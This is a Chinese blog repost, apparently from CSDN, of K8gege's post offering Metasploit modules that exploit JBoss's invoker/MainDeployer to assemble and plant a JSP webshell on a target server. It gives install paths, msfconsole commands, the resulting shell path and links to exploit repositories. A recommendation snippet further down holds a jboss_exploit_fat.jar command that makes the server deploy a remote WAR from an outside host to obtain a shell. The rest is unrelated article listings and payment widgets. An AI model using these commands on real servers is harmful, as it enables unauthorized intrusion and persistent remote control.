[EXP]K8 jboss invoke deploy getshell exploit

最新推荐文章于 2022-04-21 21:03:45 发布
最新推荐文章于 2022-04-21 21:03:45 发布
阅读量1.1k 收藏
点赞数
原文链接:http://www.cnblogs.com/k8gege/p/10454215.html
版权

MSF jboss invoke deploy EXPLOIT moudle

Date:2013.11.28
Author:K8gege

改这个EXP中 过程有点不进人意 没能在一个payload里直接输出小马
无奈只能分成了6步来执行,长度有限制 只能一次写入一段内容。
以追加方式写入 最后才构造出 JSP 小马...

用法
BT5  MSF 下 JBOSS EXP存放路径 把这几个脚本丢到这里来
/opt/metasploit/msf3/modules/exploit/multi/http/

msfconsole
use exploit/multi/http/jboss_invoke_deploy_K80

use exploit/multi/http/jboss_invoke_deploy_K81
use exploit/multi/http/jboss_invoke_deploy_K82
use exploit/multi/http/jboss_invoke_deploy_K83
use exploit/multi/http/jboss_invoke_deploy_K84
use exploit/multi/http/jboss_invoke_deploy_K85

set RHOST 172.16.126.134
exploit

成功后小马路径为  www.xxoo.com/jboosjdk/inc.jsp  
使用K8新型小马客户端连接 可上传任意格式文件

 

https://github.com/k8gege/JbossExploit

https://github.com/k8gege/K8tools

 

转载于:https://www.cnblogs.com/k8gege/p/10454215.html

王爷的大房子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JMS(Jboss Messaging)的一点使用心得(七)JBoss invoke-动态创建Queue或者Topic
Free-从心开始
11-26 2338
JBoss是通过配置文件构建的,但是我们可以用代码通过Invoke的方式修改这些MBean。其实,下的所有MBean都可以用这种方式修改,比如说动态创建Queue或者是Topic.    public void createQueueInJboss(String queueName) ...{        try ...{            Context context;     
JMS(Jboss Messaging)的一点使用心得(八)JBoss invoke-动态修改Bridge
Free-从心开始
11-26 1340
下面是利用Invoke修改Bridge的代码    private void openBridge() ...{        try ...{            Context context;            Hashtable String, String> jndiMap = new Hashtable String, String>();            jndi
K8亲和性
qq_42747099的博客
04-15 5万+
nodeSelector调度方式 label是kubernetes中一个非常重要的概念,用户可以非常灵活的利用标签来管理集群中的资源,比如最常见的一个就是service通过匹配标签去匹配Pod资源,而Pod的调度也可以根据节点的标签来进行调度。 nodeSelector使用标签将pod强制调度到指定node节点上 亲和性和反亲和性 跳读亲和性可以分为软策略、硬策略两种。 软策略:preferre...
电影推荐《看过3000部,推荐30部:百里挑一》
世界上最美的语言有两种:5线谱和2进制
12-14 10万+
选片子,其实也是选导演。 我个人最喜欢的9位导演依次是:路易斯•布努埃尔 Luis Buñuel;迈克尔•哈内克 Michael Haneke;阿涅斯•瓦尔达 Agnès Varda;洪尚秀 Sang-soo Hong;吉姆•贾木许 Jim Jarmusch;蔡明亮 Ming-liang Tsai;杨•史云梅耶 Jan Svankmajer;克日什托夫•基耶斯洛夫斯基 Krzysztof Kie
k8s基础理论
喀喀喀的博客
04-21 7万+
1.核心对象 NameSpaces 当集群有多个用户或一个用户有多个应用需要管理时,需要对被管理的对象进行隔离。不同的对象被划分到不同的namespaces后,可以通过权限控制来限制用户以何种权限访问namespaces的哪些对象,进而构建一个多租户,彼此隔离的通用集群。 namespaes,它提供一种内核级别的隔离方式,系统可以为进程分配不同的namespaces,并保证不同namespace资源独立分配,进程彼此隔离,即不同的namespace下的进程互不干扰。 namespace提供六项隔离:分别是
jboss漏洞getshell工具.zip
最新发布
08-26
JBoss 漏洞与 GetShell 工具详解】 JBoss 是一款广泛使用的开源 Java 应用服务器,由 Red Hat 公司开发并维护。它提供了全面的企业级应用程序部署和管理功能,支持多种 Java EE 规范。然而,由于其复杂性和广泛...
jboss-exp.rar
07-22
某大牛写的jboss-exp 1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_...
jboss_exploit_fat
09-06
java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: ...
maven-jboss-deploy-plugin-1.6.jar
03-12
maven-jboss-deploy-plugin-1.6.jar
maven-jboss-deploy-plugin-1.5.jar
03-12
maven-jboss-deploy-plugin-1.5.jar
appServer JBoss / jboss / Wildfly 8.1 / wildfly 8
06-10
NULL 博文链接:https://lindows.iteye.com/blog/234603
经典网站
wzh1215的专栏
07-03 4万+
1,看看自己具有哪个大明星的脸型 http://www.play-analogia.com/cgi-bin/index/ 2,超有意思的Flash网站,虚拟办公 http://agencynet.com 3,亲自动手给美女画纹身 http://www.crustydemons.co.uk/UK/tattoo_parlour/index.html 4,输入文字就发出声音! http://
《奥特曼》大电影将让孩子一战成名
amk87793的博客
05-22 1636
幼儿园老师打来电话,说孩子表现异常,半天时间,连续将班内20多个小朋友推倒,并问是否带小朋友去看了《奥特曼》大电影,答曰是,老师称,本周班内共5 名小朋友暴力倾向严重,经询问全部刚刚看过《奥特曼》,逐无语。战台烽多年前就曾撰文呼吁国内动画片分级,尤以“奥特曼”此种特摄片为重,没想到自己却也着了道…… 国人的固有思维将奥特曼归为儿童派 奥特曼是...
将图片转化为.py文件
dujuancao11的博客
04-18 6万+
图片 转换代码 import base64 def pic2py(picture_name): """ 将图像文件转换为py文件 :param picture_name: :return: """ open_pic = open("%s" % picture_name, 'rb') b64str = base64.b64encode(open_pic.read()) open_pic.close() # 注意这边b64st
K82公有链研究
热门推荐
skywt的博客
07-14 12万+
公有链(Public Blockchain)是指全世界任何人都可以随时进入到系统中读取数据、发送可确认交易、竞争记账的区块链。公有链通常被认为是“完全去中心化”的,因为没有任何个人或者机构可以控制或篡改其中数据的读写。公有链一般会通过代币机制来鼓励参与者竞争记账,来确保数据的安全性。比特币、以太坊都是典型的公有链。私有链(Private Blockchain)是指其写入权限由某个组织和机构控制的区...
tomcat热部署tomcat7:deploy Cannot invoke Tomcat manager: Connection reset by peer: socket
javaofliang的博客
08-17 7728
配置文件如下 pom.xml org.apache.tomcat.maven tomcat7-maven-plugin 8080 UTF-8 http://XXX:8080/manager/text tomcat tomcat tomcat-user.xml
免费编程学习资源
平凡的梦
09-12 1万+
web项目   1. 链接: https://pan.baidu.com/s/1qZcykm4 密码: c5va   2. 链接: https://pan.baidu.com/s/1i64wMNV 密码: jv34   3. 链接: https://pan.baidu.com/s/1o9dinNG 密码: rqu8   4. 链接: https://pan.baidu.com/s/...
视频流
qq_32439381的博客
08-03 3595
问题:最近在做视频直播,延迟问题很严重,pc端还好,延迟5s左右,在微信h5有时候延迟30s以上,所以来研究一下视频播放          PC用的是flv.js播放的,微信使用h5 video播放 一、HTML5录制视频     可以使用强大的webRTC,目前腾讯的实时音视频就是用的webRTC,但是兼容性不是很好 二、播放直播视频 目前有两种视频协议流,一种是HLS,另外一种是...
〖教程〗K8飞刀-网络安全CTF解题Web篇10个例子
K8哥哥
08-23 1428
前段时间有人和我说什么时候有空出些CTF用的工具,实际上CTF考查的内容,实战中用到的很多工具都可以使用,关键在于你懂不懂用。也看到有人搜索如何使用K8飞刀,在此以CTF题为例,教大家如何使用K8飞刀的HackerIE功能(相当于Hackbar插件的高级版),以及编码解码功能的使用(模块涉及多种编码以及加密解密算法),除了实战会用到以外,CTF也可以用到,不过CTF中常见的应该是BASE64、HTML编码、SQL注入编码之类的,实战中密码除了MD5、SHA1以外最常见的莫过于BASE64了,XSS里HTML
JBoss 4.0 中文入门指南
"JBoss中文手册" JBoss是著名的开源Java EE应用服务器,它在企业级环境中广泛应用,并且在开发者和开源社区中具有广泛的影响力。JBoss 4.0 Release 2版本是在2004年发布,通过了J2EE 1.4认证,其基础代码源于JBoss ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值